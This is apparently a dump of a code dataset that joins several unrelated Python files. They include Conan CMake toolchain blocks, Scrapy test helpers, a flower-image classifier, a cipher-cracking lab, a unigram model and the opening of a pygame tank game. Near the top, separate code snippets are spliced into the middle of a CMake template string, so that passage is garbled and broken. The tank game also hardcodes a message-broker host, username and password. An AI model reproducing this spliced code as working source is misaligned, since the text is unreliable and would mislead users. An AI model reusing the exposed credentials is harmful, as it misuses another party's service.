IN_TRY_COMPILE )\n if(_CMAKE_IN_TRY_COMPILE)\n message(STATUS \"Running toolchain IN_TRY_COMPILE\")\n return()\n endif()\n \"\"\")\n\n\nclass CompilersBlock(Block):\n template = textwrap.dedent(r\"\"\"\n {% for lang, compiler_path in compilers.items() %}\n set(CMAKE_{{ lang }}_COMPILER \"{{ compiler_path|replace('\\\\', '/') }}\")\n {% endfor %}\n \"\"\")\n\n def context(self):\n # Reading configuration from \"tools.build:compiler_executables\" -> {\"C\": \"/usr/bin/gcc\"}\n compilers_by_conf = self._conanfile.conf.get(\"tools.build:compiler_executables\", default={},\n check_type=dict)\n # Map the possible languages\n compilers = {}\n # Allowed variables (and _LAUNCHER)\n compilers_mapping = {\"c\": \"C\", \"cuda\": \"CUDA\", \"cpp\": \"CXX\", \"objc\": \"OBJC\",\n \"objcpp\": \"OBJCXX\", \"rc\": \"RC\", 'fortran': \"Fortran\", 'asm': \"ASM\",\n \"hip\": \"HIP\", \"ispc\": \"ISPC\"}\n for comp, lang in compilers_mapping.items():\n # To set CMAKE__COMPILER\n if comp in compilers_by_conf:\n compilers[lang] = compilers_by_conf[comp]\n return {\"compilers\": compilers}\n\n\nclass GenericSystemBlock(Block):\n template = textwrap.dedent(\"\"\"\n {% if cmake_sysroot %}\n set(CMAKE_SYSROOT {{ cmake_sysroot }})\n {% endif %}\n\n {% if cmake_system_name %}\n # Cross building\n set(CMAKE_SYSTEM_NAME {{ cmake_system_name }})\n {% endif %}\n {% if cmake_system_version %}\n 
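# ExtraFlagsBlock above reads flags straight from [conf]; in a Conan 2 profile
# that looks like the snippet below (kept in a string so this file stays valid
# Python -- it is profile syntax, not Python):
PROFILE_CONF_EXAMPLE = """
[conf]
tools.build:cxxflags=["-fstack-protector-strong"]
tools.build:defines=["FOO=1"]
"""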
set(CMAKE_SYSTEM_VERSION {{ cmake_system_version }})\n {% endif %}\n {% if cmake_system_processor %}\n set(CMAKE_SYSTEM_PROCESSOR {{ cmake_system_processor }})\n {% endif %}\n\n {% if generator_platform %}\n set(CMAKE_GENERATOR_PLATFORM \"{{ generator_platform }}\" CACHE STRING \"\" FORCE)\n {% endif %}\n {% if toolset %}\n set(CMAKE_GENERATOR_TOOLSET \"{{ toolset }}\" CACHE STRING \"\" FORCE)\n {% endif %}\n \"\"\")\n\n def _get_toolset(self, generator):\n toolset = None\n if generator is None or (\"Visual\" not in generator and \"Xcode\" not in generator):\n return None\n settings = self._conanfile.settings\n compiler = settings.get_safe(\"compiler\")\n if compiler == \"intel-cc\":\n return IntelCC(self._conanfile).ms_toolset\n elif compiler == \"msvc\":\n toolset = settings.get_safe(\"compiler.toolset\")\n if toolset is None:\n compiler_version = str(settings.compiler.version)\n compiler_update = str(settings.compiler.update)\n if compiler_update != \"None\": # It is full one(19.28), not generic 19.2X\n # The equivalent of compiler 19.26 is toolset 14.26\n toolset = \"version=14.{}{}\".format(compiler_version[-1], compiler_update)\n else:\n toolset = msvc_version_to_toolset_version(compiler_version)\n elif compiler == \"clang\":\n if generator and \"Visual\" in generator:\n if \"Visual Studio 16\" in generator or \"Visual Studio 17\" in generator:\n toolset = \"ClangCL\"\n else:\n raise ConanException(\"CMakeToolchain with compiler=clang and a CMake \"\n \"'Visual Studio' generator requires VS16 or VS17\")\n toolset_arch = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:toolset_arch\")\n if toolset_arch is not None:\n toolset_arch = \"host={}\".format(toolset_arch)\n toolset = toolset_arch if toolset is None else \"{},{}\".format(toolset, toolset_arch)\n return toolset\n\n def _get_generator_platform(self, generator):\n settings = self._conanfile.settings\n # Returns the generator platform to be used by CMake\n compiler = settings.get_safe(\"compiler\")\n arch = settings.get_safe(\"arch\")\n\n if settings.get_safe(\"os\") == \"WindowsCE\":\n return settings.get_safe(\"os.platform\")\n\n if compiler in (\"msvc\", \"clang\") and generator and \"Visual\" in generator:\n return {\"x86\": \"Win32\",\n \"x86_64\": \"x64\",\n \"armv7\": \"ARM\",\n \"armv8\": \"ARM64\",\n \"arm64ec\": \"ARM64EC\"}.get(arch)\n return None\n\n def _get_generic_system_name(self):\n os_host = self._conanfile.settings.get_safe(\"os\")\n os_build = self._conanfile.settings_build.get_safe(\"os\")\n arch_host = self._conanfile.settings.get_safe(\"arch\")\n arch_build = self._conanfile.settings_build.get_safe(\"arch\")\n cmake_system_name_map = {\"Neutrino\": \"QNX\",\n \"\": \"Generic\",\n \"baremetal\": \"Generic\",\n None: \"Generic\"}\n if os_host != os_build:\n return cmake_system_name_map.get(os_host, os_host)\n elif arch_host is not None and arch_host != arch_build:\n if not ((arch_build == \"x86_64\") and (arch_host == \"x86\") or\n (arch_build == \"sparcv9\") and (arch_host == \"sparc\") or\n (arch_build == \"ppc64\") and (arch_host == \"ppc32\")):\n return cmake_system_name_map.get(os_host, os_host)\n\n def _is_apple_cross_building(self):\n os_host = self._conanfile.settings.get_safe(\"os\")\n arch_host = self._conanfile.settings.get_safe(\"arch\")\n arch_build = self._conanfile.settings_build.get_safe(\"arch\")\n os_build = self._conanfile.settings_build.get_safe(\"os\")\n return os_host in ('iOS', 'watchOS', 'tvOS', 'visionOS') or (\n os_host == 'Macos' and (arch_host != arch_build or os_build != 
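# The MSVC toolset derivation above turns a full compiler version plus update
# into "version=14.XU", otherwise falling back to a generic toolset per
# Conan's msvc_version_to_toolset_version mapping. A stand-alone demo of just
# the string arithmetic (fallback table abbreviated, values per Conan's
# mapping of 19X -> v14X):
def msvc_toolset(version, update=None):
    if update is not None:
        return "version=14.{}{}".format(version[-1], update)
    return {"190": "v140", "191": "v141", "192": "v142", "193": "v143"}.get(version)

assert msvc_toolset("193", "2") == "version=14.32"
assert msvc_toolset("192") == "v142"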
os_host))\n\n def _get_cross_build(self):\n user_toolchain = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:user_toolchain\")\n\n system_name = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:system_name\")\n system_version = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:system_version\")\n system_processor = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:system_processor\")\n\n if not user_toolchain: # try to detect automatically\n os_host = self._conanfile.settings.get_safe(\"os\")\n arch_host = self._conanfile.settings.get_safe(\"arch\")\n if arch_host == \"armv8\":\n arch_host = {\"Windows\": \"ARM64\", \"Macos\": \"arm64\"}.get(os_host, \"aarch64\")\n\n if system_name is None: # Try to deduce\n _system_version = None\n _system_processor = None\n if self._is_apple_cross_building():\n # cross-build in Macos also for M1\n system_name = {'Macos': 'Darwin'}.get(os_host, os_host)\n # CMAKE_SYSTEM_VERSION for Apple sets the sdk version, not the os version\n _system_version = self._conanfile.settings.get_safe(\"os.sdk_version\")\n _system_processor = to_apple_arch(self._conanfile)\n elif os_host != 'Android':\n system_name = self._get_generic_system_name()\n _system_version = self._conanfile.settings.get_safe(\"os.version\")\n _system_processor = arch_host\n\n if system_name is not None and system_version is None:\n system_version = _system_version\n if system_name is not None and system_processor is None:\n system_processor = _system_processor\n\n return system_name, system_version, system_processor\n\n def context(self):\n generator = self._toolchain.generator\n generator_platform = self._get_generator_platform(generator)\n toolset = self._get_toolset(generator)\n system_name, system_version, system_processor = self._get_cross_build()\n\n # This is handled by the tools.apple:sdk_path and CMAKE_OSX_SYSROOT in Apple\n cmake_sysroot = self._conanfile.conf.get(\"tools.build:sysroot\")\n cmake_sysroot = cmake_sysroot.replace(\"\\\\\", \"/\") if cmake_sysroot is not None else None\n\n return {\"toolset\": toolset,\n \"generator_platform\": generator_platform,\n \"cmake_system_name\": system_name,\n \"cmake_system_version\": system_version,\n \"cmake_system_processor\": system_processor,\n \"cmake_sysroot\": cmake_sysroot}\n\n\nclass OutputDirsBlock(Block):\n\n @property\n def template(self):\n if not self._conanfile.package_folder:\n return \"\"\n\n return textwrap.dedent(\"\"\"\n set(CMAKE_INSTALL_PREFIX \"{{package_folder}}\")\n {% if default_bin %}\n set(CMAKE_INSTALL_BINDIR \"{{default_bin}}\")\n set(CMAKE_INSTALL_SBINDIR \"{{default_bin}}\")\n set(CMAKE_INSTALL_LIBEXECDIR \"{{default_bin}}\")\n {% endif %}\n {% if default_lib %}\n set(CMAKE_INSTALL_LIBDIR \"{{default_lib}}\")\n {% endif %}\n {% if default_include %}\n set(CMAKE_INSTALL_INCLUDEDIR \"{{default_include}}\")\n set(CMAKE_INSTALL_OLDINCLUDEDIR \"{{default_include}}\")\n {% endif %}\n {% if default_res %}\n set(CMAKE_INSTALL_DATAROOTDIR \"{{default_res}}\")\n {% endif %}\n \"\"\")\n\n def _get_cpp_info_value(self, name):\n # Why not taking cpp.build? 
because this variables are used by the \"cmake install\"\n # that correspond to the package folder (even if the root is the build directory)\n elements = getattr(self._conanfile.cpp.package, name)\n return elements[0] if elements else None\n\n def context(self):\n if not self._conanfile.package_folder:\n return {}\n return {\"package_folder\": self._conanfile.package_folder.replace(\"\\\\\", \"/\"),\n \"default_bin\": self._get_cpp_info_value(\"bindirs\"),\n \"default_lib\": self._get_cpp_info_value(\"libdirs\"),\n \"default_include\": self._get_cpp_info_value(\"includedirs\"),\n \"default_res\": self._get_cpp_info_value(\"resdirs\")}\n\n\nclass ToolchainBlocks:\n def __init__(self, conanfile, toolchain, items=None):\n self._blocks = OrderedDict()\n self._conanfile = conanfile\n self._toolchain = toolchain\n if items:\n for name, block in items:\n self._blocks[name] = block(conanfile, toolchain)\n\n def keys(self):\n return self._blocks.keys()\n\n def items(self):\n return self._blocks.items()\n\n def remove(self, name, *args):\n del self._blocks[name]\n for arg in args:\n del self._blocks[arg]\n\n def select(self, name, *args):\n \"\"\"\n keep the blocks provided as arguments, remove the others\n \"\"\"\n to_keep = [name] + list(args)\n self._blocks = OrderedDict((k, v) for k, v in self._blocks.items() if k in to_keep)\n\n def __setitem__(self, name, block_type):\n # Create a new class inheriting Block with the elements of the provided one\n block_type = type('proxyUserBlock', (Block,), dict(block_type.__dict__))\n self._blocks[name] = block_type(self._conanfile, self._toolchain)\n\n def __getitem__(self, name):\n return self._blocks[name]\n\n def process_blocks(self):\n result = []\n for b in self._blocks.values():\n content = b.get_rendered_content()\n if content:\n result.append(content)\n return result\n","repo_name":"conan-io/conan","sub_path":"conan/tools/cmake/toolchain/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":36612,"program_lang":"python","lang":"en","doc_type":"code","stars":7343,"dataset":"github-code","pt":"77"} +{"seq_id":"19449474117","text":"\"\"\"\nThis module contains some assorted functions used in tests\n\"\"\"\n\nimport os\n\nfrom importlib import import_module\nfrom twisted.trial.unittest import SkipTest\n\n\ndef assert_aws_environ():\n \"\"\"Asserts the current environment is suitable for running AWS testsi.\n Raises SkipTest with the reason if it's not.\n \"\"\"\n try:\n import boto\n except ImportError as e:\n raise SkipTest(str(e))\n\n if 'AWS_ACCESS_KEY_ID' not in os.environ:\n raise SkipTest(\"AWS keys not found\")\n\ndef get_crawler(settings_dict=None):\n \"\"\"Return an unconfigured Crawler object. 
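# ToolchainBlocks above is what conanfile authors reach through
# CMakeToolchain.blocks: blocks can be removed, selected, tweaked via .values,
# or replaced with a user Block subclass. A hedged usage sketch -- the block
# names ("rpath", "generic_system") follow Conan 2's registry and may differ
# across versions:
from conan import ConanFile
from conan.tools.cmake import CMakeToolchain

class PkgConan(ConanFile):
    settings = "os", "arch", "compiler", "build_type"

    def generate(self):
        tc = CMakeToolchain(self)
        tc.blocks.remove("rpath")            # drop the SkipRPath block entirely
        # tweak one template variable before rendering
        tc.blocks["generic_system"].values["cmake_system_name"] = "Generic"
        tc.generate()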
If settings_dict is given, it\n will be used as the settings present in the settings module of the\n CrawlerSettings.\n \"\"\"\n from scrapy.crawler import Crawler\n from scrapy.settings import CrawlerSettings\n\n class SettingsModuleMock(object):\n pass\n settings_module = SettingsModuleMock()\n if settings_dict:\n for k, v in settings_dict.items():\n setattr(settings_module, k, v)\n settings = CrawlerSettings(settings_module)\n return Crawler(settings)\n\ndef get_pythonpath():\n \"\"\"Return a PYTHONPATH suitable to use in processes so that they find this\n installation of Scrapy\"\"\"\n scrapy_path = import_module('scrapy').__path__[0]\n return os.path.dirname(scrapy_path) + os.pathsep + os.environ.get('PYTHONPATH', '')\n\ndef get_testenv():\n \"\"\"Return a OS environment dict suitable to fork processes that need to import\n this installation of Scrapy, instead of a system installed one.\n \"\"\"\n env = os.environ.copy()\n env['PYTHONPATH'] = get_pythonpath()\n return env\n\ndef get_testlog():\n \"\"\"Get Scrapy log of current test, ignoring the rest\"\"\"\n thistest = []\n loglines = open(\"test.log\").readlines()\n for l in loglines[::-1]:\n thistest.append(l)\n if \"[-] -->\" in l:\n break\n return \"\".join(thistest[::-1])\n\n\ndef assert_samelines(testcase, text1, text2, msg=None):\n \"\"\"Asserts text1 and text2 have the same lines, ignoring differences in\n line endings between platforms\n \"\"\"\n testcase.assertEqual(text1.splitlines(), text2.splitlines(), msg)\n","repo_name":"sorig/moodle-scraper","sub_path":"venv/lib/python2.7/site-packages/scrapy/utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"42715967371","text":"import io\nfrom torchvision import models\nfrom torch import nn\nimport os\nfrom PIL import Image\nimport json\nimport PIL\nimport requests\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\nimport urllib\nimport time\nimport logging\nimport numpy as np\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nimage_transforms = transforms.Compose([\n transforms.Resize(200),\n transforms.CenterCrop(200),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n])\n\n\n# Load class_to_name json file\ndef load_json(json_file):\n with open(json_file, 'r') as f:\n index_to_name = json.load(f)\n return index_to_name\n\n\ndef flower_model(model_dir):\n model = models.resnet50(pretrained=False)\n checkpoint = torch.load(model_dir, map_location=torch.device('cpu'))\n\n model.class_to_idx = checkpoint['class_to_idx']\n num_classes = checkpoint['output_size']\n model.fc = nn.Sequential(\n nn.Linear(2048, 512),\n nn.ReLU(),\n nn.Dropout(p=0.2),\n nn.Linear(512, num_classes))\n model.load_state_dict(checkpoint['model_state_dict'])\n model = model.eval()\n return model\n\n\ndef prediction(model, image, index_to_name, transforms, topk=5):\n ''' Predict the class (or classes) of an image using a trained deep learning model.\n '''\n image = image.convert('RGB')\n image = transforms(image).unsqueeze(0)\n with torch.no_grad():\n predictions = model(image)\n # Convert softmax output to probabilities\n probabilities = torch.softmax(predictions, dim=1)\n # Probabilities and the indices of those probabilities corresponding to the classes\n top_prob, top_indices = torch.topk(probabilities, k=topk)\n # Convert to lists\n top_indices = top_indices.to('cpu').numpy()\n top_indices 
= top_indices[0].tolist()\n # Convert topk_indices to the actual class labels using class_to_idx\n # Invert the dictionary so you get a mapping from index to class.\n idx_to_class = {value: key for key, value in model.class_to_idx.items()}\n # print(idx_to_class)\n top_classes = [idx_to_class[index] for index in top_indices]\n # Convert from the class into inference_handler encoding to actual flower names\n result = []\n for i in range(topk):\n pred = {'name': index_to_name[top_classes[i]], 'score': f'{top_prob.cpu().numpy()[0][i]}'}\n result.append(pred)\n return result\n\n\ndef inference_handler(event, context):\n flower_index_to_name = load_json('/home/allen/SnapKnow Deploy/data/flower_to_name.json')\n flower_recog = flower_model(model_dir='/home/allen/SnapKnow Deploy/data/flower_best_model.pth')\n\n url = event[\"body\"][\"url\"]\n image = Image.open(urllib.request.urlopen(url))\n\n flower_response = prediction(flower_recog, image, flower_index_to_name, image_transforms, topk=4)\n\n return json.dumps(flower_response)\n\ndef test(url):\n flower_index_to_name = load_json('/home/allen/SnapKnow Deploy/data/flower_to_name.json')\n flower_recog = flower_model(model_dir='/home/allen/SnapKnow Deploy/data/flower_best_model.pth')\n\n image = Image.open(urllib.request.urlopen(url))\n\n flower_response = prediction(flower_recog, image, flower_index_to_name, image_transforms, topk=4)\n\n return {'Response': flower_response}\n\nurl = 'https://raw.githubusercontent.com/shivajid/Yolo/master/data/eagle.jpg'\nprint(test(url=url))","repo_name":"AllenAkhaumere/snapknow_lambda_functions","sub_path":"flower_deploy/flower_lambda.py","file_name":"flower_lambda.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9363310930","text":"#@author: Sam Chen\n#Lab 1\n\n#Part 1 Bruteforcing\n#whats in a name a rose by any other name would smell as sweet\n#there are two things to a imatin life first to get what you want and a\nimport random\nimport enchant\nimport re\nimport ngram_score\n\ndictionary = enchant.Dict(\"en_US\") #makes dictionary for english\nalphabets = \"abcdefghijklmnopqrstuvwxyz\"\nalphaCAP = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" \ntransAlphabet = {}\nkey = \"qwertyuiopasdfghjklzxcvbnm\"\n\n#make a dictionary for our alphabets for our encrypt and decrypt \ndef createDict(shift):\n for i in range(0, 26):\n letter = alphabets[i]\n transAlphabet[letter] = alphabets[(i+shift) % 26]\n \n#decrypts the passed in message with message parameter\n#makes an empty string for the ciphertext to go into\n#passes all the possibilities to detect function to find english words\ndef decrypt(message):\n ciphertext = ''\n for letter in message:\n if letter in transAlphabet:\n letter = transAlphabet[letter]\n ciphertext = ciphertext + letter\n else:\n ciphertext = ciphertext + ' '\n #print (\"\\nPrint possibilities: \", ciphertext)\n detect(ciphertext)\n\n#detects first english word from an imported english dictionary and prints out the phrase\ndef detect(decrypted):\n word = decrypted.split(\" \")\n check = dictionary.check(word[0])\n if check:\n print(\"\\nDecrypted bruteforce phrases: \", decrypted)\n return\n\n#Attempt to encrypt part 1 for phrases 3 and 4\ndef encrypt(msg, key, alphabet): #takes in the given phrase and global variable of alphabets\n cipher = \"\"\n upperAlpha = key.upper() #turns the lowercase in the alphabets into uppercase\n for i in msg:\n if i.isalpha(): #when the phrase is alphabetical and is uppercase 
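# The prediction() helper above goes logits -> probabilities -> top-k class
# names. The same pipeline on dummy data, with a made-up 3-class mapping, to
# show the tensor shapes involved (no model or image download needed):
import torch

logits = torch.tensor([[2.0, 0.5, -1.0]])    # pretend model output, batch of 1
probs = torch.softmax(logits, dim=1)
top_prob, top_idx = torch.topk(probs, k=2)
idx_to_class = {0: "21", 1: "3", 2: "48"}    # index -> class label (hypothetical)
class_to_name = {"21": "fire lily", "3": "canterbury bells", "48": "buttercup"}
result = [{"name": class_to_name[idx_to_class[i]],
           "score": float(top_prob[0, j])}
          for j, i in enumerate(top_idx[0].tolist())]
print(result)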
\n if i.isupper():\n cipher += upperAlpha[alphaCAP.find(i)] #finds the letters in the key and encrypts it\n else:\n cipher += key[alphabets.find(i)] \n else:\n cipher += i \n return cipher\n\n#Part 2 Encrypting and Decrypting a given phrase\n#Encrypts the 3 given messages with a simple substitution cipher\ndef encrypt2(msg, key): #takes in the given phrase and global variable of alphabets\n cipher = \"\"\n upperAlpha = key.upper() #turns the lowercase in the alphabets into uppercase\n for i in msg:\n if i.isalpha(): #when the phrase is alphabetical and is uppercase \n if i.isupper():\n cipher += upperAlpha[alphaCAP.find(i)] #finds the letters in the key and encrypts it\n else:\n cipher += key[alphabets.find(i)] \n else:\n cipher += i \n return cipher\n\n#Decrypts the 3 given phrases with the passed in encryption and a randomly generated key\ndef decryptPart2(cipher, key):\n text = \"\"\n upperAlpha = key.upper()\n for i in cipher:\n if i.isalpha():\n if i.isupper():\n text += alphaCAP[upperAlpha.find(i)]\n else:\n text += alphabets[key.find(i)]\n else:\n text += i\n return text\n\n#Generates a random key to use for part 2 to accomplish the task of encrypting and decrypting the 3 phrases\ndef makeKey():\n randomList = list(alphabets) #turns the string into a list\n random.shuffle(randomList) #shuffles the list\n newKey = (\"\".join(randomList)) #turn list back into a string\n return newKey\n\n#Executes the substitution cipher for part 2\n#Starts by generating a random key then passed the 3 phrases to our Encrypt and Decrypt functions\n#Prints out the results of encryption and decryption\ndef part2():\n start = makeKey()\n e = encrypt2(\"He who fights with monsters should look to it that he himself does not become a monster And if you gaze long into an abyss the abyssal so gazes into you\", start)\n e1 = encrypt2(\"There is a theory which states that if ever anybody discovers exactly what the Universe is for and why it is here it will instantly disappear and be replaced by something even more bizarre and inexplicable There is another theory which states that this has already happened\", start)\n e2 = encrypt2(\"Whenever I find myself growing grim about the mouth whenever it isa damp drizzly November in my soul whenever I find myself involuntarily pausing before coffin warehouses and bringing up therear of every funeral I meet and especially whenever my hypos get such an upper hand of me that it requires a strong moral princip leto prevent me from deliberately stepping into the street and methodically knocking peoples hats off then I account it hightime to get to sea as soon as I can\", start)\n print(\"\\nEncryption1: \", e)\n print(\"\\nEncryption2: \", e1)\n print(\"\\nEncryption3: \", e2)\n d = decryptPart2(e, start)\n d1 = decryptPart2(e1, start)\n d2 = decryptPart2(e2, start)\n print(\"\\nDecryption1: \", d)\n print(\"\\nDecryption2: \", d1)\n print(\"\\nDecryption3: \", d2)\n\n#Begin program\nif __name__ == '__main__':\n \n #activates part 1 bruteforce style\n #creates and starts the dictionary \n #loops throughout the alphabet\n for i in range(0,26):\n createDict(i)\n decrypt(\"fqjcb rwjwj vnjax bnkhj whxcq nawjv nfxdu mbvnu ujbbf nn\")\n decrypt(\"oczmz vmzor jocdi bnojv dhvod igdaz admno ojbzo rcvot jprvi oviyvaozmo cvooj ziejt dojig toczr dnzno jahvi fdiyv xcdzq zoczn zxjiy\")\n\n #activates part 2 for simple substition cipher encryption and decryption\n part2() \n\n #Part 1: Attempts to decrypts phrases 3 and 4\n graham = ngram_score.ngram_score('C:/Users/SamTopSSD/CECS378 
Labs/quadgrams.txt') # load our quadgram statistics\n\n mystery='ejitp spawa qleji taiul rtwll rflrl laoat wsqqj atgac kthls iraoatwlpl qjatw jufrh lhuts qataq itats aittk stqfj cae'\n mystery1='iyhqz ewqin azqej shayz niqbe aheum hnmnj jaqii yuexq ayqkn jbeuqiihed yzhni ifnun sayiz yudhe sqshu qesqa iluym qkque aqaqm oejjshqzyu jdzqa diesh niznj jayzy uiqhq vayzq shsnj jejjz nshna hnmytisnae sqfun dqzew qiead zevqi zhnjq shqze udqai jrmtq uishq ifnunsiiqa suoij qqfni syyle iszhn bhmei squih nimnx hsead shqmr udququaqeu iisqe jshnj oihyy snaxs hqihe lsilu ymhni tyz'\n \n masterkey = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n masterscore = -99999\n bigscore,bigkey = masterscore,masterkey[:] #big score copy of master score, big key copy of alphabet\n \n\n i = 0\n while 1:\n i = i+1\n random.shuffle(bigkey)\n deciphered = encrypt(mystery, key, bigkey)\n bigscore = graham.score(deciphered)\n count = 0\n\n\n while count < 999 and count <= 690:\n a = random.randint(0,25)\n b = random.randint(0,25)\n child = bigkey[:]\n # swap two characters in the child\n child[a],child[b] = child[b],child[a]\n str1 = \" \".join(child)\n deciphered = encrypt(mystery, str1, bigkey)\n score = graham.score(deciphered)\n # if the child was better, replace the parent with it\n if score > bigscore:\n bigscore = score\n bigkey = child[:]\n count = 0\n count = count+1\n\n\n # keep track of best score seen so far\n if bigscore > masterscore:\n masterscore,masterkey = bigscore,bigkey[:]\n print('\\nbest score so far:',masterscore,'on iteration', i)\n print('best key: '+''.join(masterkey))\n print('plaintext: '+ deciphered)\n \n\n","repo_name":"abstractprototype/CSULB-Projects","sub_path":"CECS378/CECS378 Labs/CECS378Lab1Submit/SymCrypt.py","file_name":"SymCrypt.py","file_ext":"py","file_size_in_byte":7590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31483006198","text":"import math\nfrom nltk.probability import SimpleGoodTuringProbDist\nfrom nltk.probability import FreqDist\nfrom nltk.util import ngrams\n\n# used for unseen words in training vocabularies\nUNK = None\n# sentence start and end\nSENTENCE_START = \"\"\nSENTENCE_END = \"\"\n\n\nclass UnigramModel:\n def __init__(self, sentences, smoothing=\"AddOne\"):\n self.unigram_frequencies = dict()\n self.corpus_length = 0\n for sentence in sentences:\n unigrams = ngrams(sentence, 1, pad_left=False, pad_right=False)\n for unigram in unigrams:\n self.unigram_frequencies[unigram] = self.unigram_frequencies.get(unigram, 0) + 1\n if unigram != SENTENCE_START and unigram != SENTENCE_END:\n self.corpus_length += 1\n # subtract 2 because unigram_frequencies dictionary contains values for SENTENCE_START and SENTENCE_END\n self.unique_words = len(self.unigram_frequencies) - 2\n self.smoothing = smoothing\n self._unigram_good_turing = SimpleGoodTuringProbDist(freqdist=FreqDist(self.unigram_frequencies))\n\n def calculate_unigram_probability(self, word):\n if self.smoothing == \"GoodTuring\":\n return self._unigram_good_turing.prob(word)\n elif self.smoothing == \"AddOne\":\n word_probability_numerator = self.unigram_frequencies.get(word, 0) + 1\n # add one more to total number of seen unique words for UNK - unseen events\n word_probability_denominator = self.corpus_length + self.unique_words + 1\n return float(word_probability_numerator) / float(word_probability_denominator)\n else:\n try:\n raise ValueError(\"Supported smoothing techniques - 1. AddOne 2. 
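# The hill-climb loop in the lab code above has a couple of rough edges (the
# candidate key is joined with spaces, and `encrypt` ignores its third
# argument), so here is a compact version of the same idea: random restarts
# plus pairwise key swaps, keeping a swap only when the quadgram fitness
# improves. `score_fn` is assumed to behave like ngram_score.score
# (higher = more English-like).
import random

ALPHA = "abcdefghijklmnopqrstuvwxyz"

def decipher(ciphertext, key):
    table = str.maketrans(key, ALPHA)   # key[i] in ciphertext means plaintext ALPHA[i]
    return ciphertext.translate(table)

def crack(ciphertext, score_fn, restarts=20, plateau=1000):
    best_key, best_score = None, float("-inf")
    for _ in range(restarts):
        key = list(ALPHA)
        random.shuffle(key)
        cur = score_fn(decipher(ciphertext, "".join(key)))
        stale = 0
        while stale < plateau:
            a, b = random.randrange(26), random.randrange(26)
            key[a], key[b] = key[b], key[a]
            s = score_fn(decipher(ciphertext, "".join(key)))
            if s > cur:
                cur, stale = s, 0
            else:
                key[a], key[b] = key[b], key[a]   # revert the swap
                stale += 1
        if cur > best_score:
            best_key, best_score = "".join(key), cur
    return best_key, best_score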
GoodTuring\")\n except ValueError as error:\n print(error.args)\n\n def calculate_sentence_probability(self, sentence):\n sentence_probability_log_sum = 0\n for word in sentence:\n if word != SENTENCE_START and word != SENTENCE_END:\n word_probability = self.calculate_unigram_probability(word)\n sentence_probability_log_sum += math.log(word_probability, 2)\n return sentence_probability_log_sum\n\n def sorted_vocabulary(self):\n full_vocab = list(self.unigram_frequencies.keys())\n full_vocab.sort()\n full_vocab.append(UNK)\n full_vocab.append(SENTENCE_START)\n full_vocab.append(SENTENCE_END)\n return full_vocab\n\n def calculate_number_of_unigrams(self, sentences):\n unigram_count = 0\n for sentence in sentences:\n unigram_count += len(sentence)\n return unigram_count\n\n def calculate_unigram_perplexity(self, sentences):\n unigram_count = self.calculate_number_of_unigrams(sentences)\n sentence_probability_log_sum = 0\n for sentence in sentences:\n try:\n sentence_probability_log_sum -= self.calculate_sentence_probability(sentence)\n except (RuntimeError, ValueError):\n sentence_probability_log_sum -= float('-inf')\n return math.pow(2, sentence_probability_log_sum / unigram_count)","repo_name":"anirban-code-to-live/LanguageModel","sub_path":"src/unigram.py","file_name":"unigram.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8085283978","text":"import requests as rq\r\nimport json\r\n\r\n\r\ndef running(sentence):\r\n sentence = sentence.encode('utf-8')\r\n return rq.post(url, data=sentence).text\r\n\r\n\r\ndef main(data_dir, parsed_data_dir):\r\n with open(data_dir, 'r', encoding='utf-8') as f:\r\n sentences = f.readlines()\r\n\r\n resutls = []\r\n for sentence in sentences:\r\n resutls.append(running(sentence))\r\n\r\n with open(parsed_data_dir, \"w\", encoding='utf-8') as f:\r\n json.dump(resutls, f, indent=4)\r\n\r\n\r\nif __name__ == '__main__':\r\n url = r'http://172.16.133.173:8080/?properties={\"annotators\":\"tokenize, ssplit, pos, lemma\",\"outputFormat\":\"json\", \"pipelineLanguage\":\"en\"}'\r\n data_dir = r''\r\n parsed_data_dir = r''\r\n main(data_dir, parsed_data_dir)\r\n","repo_name":"scofield7419/StruMatchDL","sub_path":"data/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"40057168687","text":"import pygame\r\nimport random\r\nimport time\r\nimport pika\r\nimport json\r\nfrom threading import Thread\r\nfrom enum import Enum\r\nimport uuid\r\nfrom pygame import mixer\r\n\r\npygame.init()\r\n\r\nIP = '34.254.177.17'\r\nPORT = '5672'\r\nVIRTUAL_HOST = 'dar-tanks'\r\nUSERNAME = 'dar-tanks'\r\nPASSWORD = '5orPLExUYnyVYZg48caMpX'\r\n\r\nclass Direction(Enum):\r\n UP = 1\r\n DOWN = 2\r\n LEFT = 3\r\n RIGHT = 4\r\n\r\nwidth = 800\r\nheight = 600\r\nscreen = pygame.display.set_mode((width, height))\r\nboosterIMG=pygame.image.load('img/powerup.png')\r\nwallImage=pygame.image.load('img/brick.png')\r\nshotSound =pygame.mixer.Sound('soundeffects/shot.wav')\r\nexplosionSound =pygame.mixer.Sound('soundeffects/explosion.wav')\r\nfont = pygame.font.SysFont('Courier New', 40)\r\nbont = pygame.font.SysFont('Courier New', 29)\r\n\r\n#duel\r\n\r\nclass Tank:\r\n def __init__(self, tank_id, x, y, speed, color, d_right, d_left, d_up, d_down, d_pull):\r\n self.id = tank_id\r\n self.x = x\r\n self.y = y\r\n self.life = 3\r\n self.speed = 3\r\n 
